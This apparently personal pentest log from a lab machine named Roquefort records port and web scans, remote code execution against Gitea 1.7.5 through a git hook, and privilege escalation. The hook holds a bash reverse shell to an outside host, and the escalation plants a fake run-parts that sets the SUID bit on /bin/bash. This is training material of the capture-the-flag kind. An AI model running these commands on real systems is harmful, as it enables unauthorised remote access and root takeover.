🧪 Pentest Log: {{date:2025-08-16}}

🔍 Target Information

• Machine Name: Roquefort
• IP Address: 192.168.182.67
• Operating System: Linux

ip=192.168.182.67

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 21

Port 22

Port 2222

Port 3000

Web Directory Scan

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

wpscan --url http://$ip

Gitea Version: 1.7.5

Google for "Gitea Version: 1.7.5" exploit, found

CVE-2020-14144

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 3000
• Vulnerability Type: RCE

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

https://github.com/p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce

Create a test user and a test repo, add post recieve hook

#!/bin/bash
/bin/bash -i >& /dev/tcp/192.168.45.163/3000 0>&1

touch README.md
git init
git add README.md
git commit -m "Initial commit"
git remote add origin http://$ip:3000/test/test.git
git push -u origin master

python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 3000

🧬 Privilege Escalation

👤 Current Access

• User: chloe
• Groups: 1000(chloe),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
• Shell Type: reverse shell

🔍 Enumeration

Writeable Path

find / -type d -maxdepth 5 -writable 2>/dev/null

Found

/usr/local/bin

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Binary Hijacking
• Target Binary/Service: run-parts
• Reference / Source: N/A

🔧 Exploit Steps

• Setup

echo 'chmod +s /bin/bash' > /usr/local/bin/run-parts
chmod +x /usr/local/bin/run-parts

• Smash to root

bash -p